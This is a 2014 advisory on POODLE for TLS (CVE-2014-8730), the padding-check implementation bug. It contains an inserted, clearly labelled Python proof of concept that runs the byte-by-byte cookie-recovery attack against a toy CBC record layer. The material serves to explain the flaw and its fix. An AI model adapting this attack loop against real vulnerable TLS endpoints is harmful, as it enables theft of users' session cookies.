POODLE for TLS

Tuesday December 16, 2014

The POODLE attack on SSL 3.0 has now been extended to some implementations of TLS. POODLE for TLS can be tracked through CVE-2014-8730.

POODLE for TLS is not a flaw in the certificate authority (CA), in SSL certificates or in certificate management systems, and it is not a flaw in the TLS protocol itself. It is an implementation bug: some TLS stacks decode the CBC record padding without checking the padding bytes, which is exactly the behaviour the original POODLE attack exploited in SSL 3.0.

Adam Langley states that “TLS’s padding is a subset of SSLv3’s padding so, technically, you could use an SSLv3 decoding function with TLS and it would still work fine. It wouldn’t check the padding bytes but that wouldn’t cause any problems in normal operation. However, if an SSLv3 decoding function was used with TLS, then the POODLE attack would work, even against TLS connections.”

Ivan Ristić advises “The main targets are browsers, because the attacker must inject malicious JavaScript to initiate the attack. A successful attack will use about 256 requests to uncover one cookie character, or only 4096 requests for a 16-character cookie. This makes the attack quite practical.”
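The mechanism behind both quotes, as an added worked example that is not part of the original article: a toy CBC record layer whose decoder can be switched between the TLS rule (every padding byte must equal the length byte) and the SSLv3 rule (only the length byte is read), and the attacker loop that copies the ciphertext block holding one cookie byte over the all-padding final block and waits for the lax decoder to accept it. Everything here is an assumption for the example: the block cipher is an 8-round Feistel network built from SHA-256 standing in for AES (so the code runs on the Python standard library alone), the MAC covers only the plaintext (real TLS also covers the sequence number and record header), and the keys, the 16-byte cookie value and all function names are constructed.

```python
"""Toy CBC record layer with a TLS-style and an SSLv3-style padding check, plus the
POODLE attacker. Added example; toy Feistel cipher, plaintext-only MAC and fixed keys/secret are assumptions."""
import hashlib
import hmac
import random

BLOCK, MAC_LEN = 16, 32   # cipher block size, HMAC-SHA256 tag length

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):   # Feistel round function, 8-byte output
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def _feistel(key, blk, rounds):
    l, r = blk[:8], blk[8:]
    for i in rounds:
        l, r = r, _xor(l, _f(key, i, r))
    return r + l   # final swap, so the same loop with reversed round order inverts it

def block_encrypt(key, blk): return _feistel(key, blk, range(8))
def block_decrypt(key, blk): return _feistel(key, blk, reversed(range(8)))

def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        out.append(_xor(block_decrypt(key, data[i:i + BLOCK]), prev))
        prev = data[i:i + BLOCK]
    return b"".join(out)

def seal_record(enc_key, mac_key, plaintext, rng):
    """TLS layout: plaintext || MAC || (pad_len + 1) bytes, each equal to pad_len."""
    tag = hmac.new(mac_key, plaintext, hashlib.sha256).digest()
    pad_len = (BLOCK - (len(plaintext) + MAC_LEN + 1) % BLOCK) % BLOCK
    record = plaintext + tag + bytes([pad_len]) * (pad_len + 1)
    iv = bytes(rng.getrandbits(8) for _ in range(BLOCK))   # fresh per-record IV
    return iv + cbc_encrypt(enc_key, iv, record)

def open_record(enc_key, mac_key, wire, strict):
    """Plaintext, or None if rejected. strict=True: TLS rule, every padding byte must
    equal the length byte. strict=False: SSLv3 rule, only the length byte is read (POODLE)."""
    iv, body = wire[:BLOCK], wire[BLOCK:]
    if not body or len(body) % BLOCK:
        return None
    rec = cbc_decrypt(enc_key, iv, body)
    pad_len = rec[-1]
    if pad_len + 1 + MAC_LEN > len(rec):
        return None
    if strict and any(b != pad_len for b in rec[-(pad_len + 1):]):
        return None
    stripped = rec[:-(pad_len + 1)]
    msg, tag = stripped[:-MAC_LEN], stripped[-MAC_LEN:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, msg, hashlib.sha256).digest()):
        return None
    return msg

def poodle_recover(client_send, server_accepts, secret_len, max_tries=5000):
    """client_send(prefix, suffix) -> fresh record of prefix+SECRET+suffix (the attacker's
    JavaScript driving the browser); server_accepts(wire) -> bool. Returns (secret, queries)."""
    out, queries = bytearray(), 0
    for k in range(secret_len):
        prefix = b"A" * ((BLOCK - 1 - k) % BLOCK)   # secret[k] becomes the last byte of a block
        target = (len(prefix) + k) // BLOCK          # index of that ciphertext block
        suffix = b"B" * (-(len(prefix) + secret_len + MAC_LEN) % BLOCK)  # force a full padding block
        for _ in range(max_tries):
            wire = client_send(prefix, suffix)
            queries += 1
            blocks = [wire[i:i + BLOCK] for i in range(0, len(wire), BLOCK)]  # blocks[0] is the IV
            forged = b"".join(blocks[:-1]) + blocks[target + 1]  # target block replaces the padding block
            if server_accepts(forged):
                out.append((BLOCK - 1) ^ blocks[target][-1] ^ blocks[-2][-1])  # P_t XOR C_{t-1} XOR C_{n-1} ended in 0x0f
                break
        else:
            return None, queries
    return bytes(out), queries

SECRET = b"sid=7f3a9c21e05b"             # constructed 16-byte cookie value
ENC_KEY, MAC_KEY = b"k" * 16, b"m" * 16  # constructed toy keys

def run_attack(strict, seed=1):
    rng = random.Random(seed)
    send = lambda p, s: seal_record(ENC_KEY, MAC_KEY, p + SECRET + s, rng)
    accepts = lambda w: open_record(ENC_KEY, MAC_KEY, w, strict) is not None
    return poodle_recover(send, accepts, len(SECRET))

def roundtrip_ok(strict):
    wire = seal_record(ENC_KEY, MAC_KEY, b"GET / HTTP/1.1", random.Random(0))
    return open_record(ENC_KEY, MAC_KEY, wire, strict) == b"GET / HTTP/1.1"

if __name__ == "__main__":
    print("lax (SSLv3-style):", run_attack(False), "\nstrict (TLS):", run_attack(True))
```

Run stand-alone, it prints the recovered cookie and the number of requests against the lax decoder (about 256 per character, matching Ristić's estimate) and `None` against the strict decoder, which rejects every forged record because the other fifteen padding bytes never also decrypt to 0x0f. The only difference between the two decoders is the single `strict` check on the padding bytes, which is why a vendor patch, not a protocol change, is the fix.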

Tests have shown that some F5 and A10 devices are vulnerable to POODLE for TLS. Qualys SSL Labs has extended its SSL Server Test to cover POODLE for TLS, so you can test your own site; a vulnerable site receives an F grade.

Unlike POODLE for SSL 3.0, which could be mitigated by disabling SSL 3.0 altogether, POODLE for TLS cannot be mitigated by turning off TLS. The only fix is a vendor patch that makes the affected implementation check the padding bytes and reject records in which they are wrong, so affected vendors must ship that patch and operators must apply it and re-test their sites.

This article was originally published by the "CA Security Council". In 2021 the CASC was restructured and renamed the "Public Key Infrastructure Consortium", or "PKI Consortium" for short.
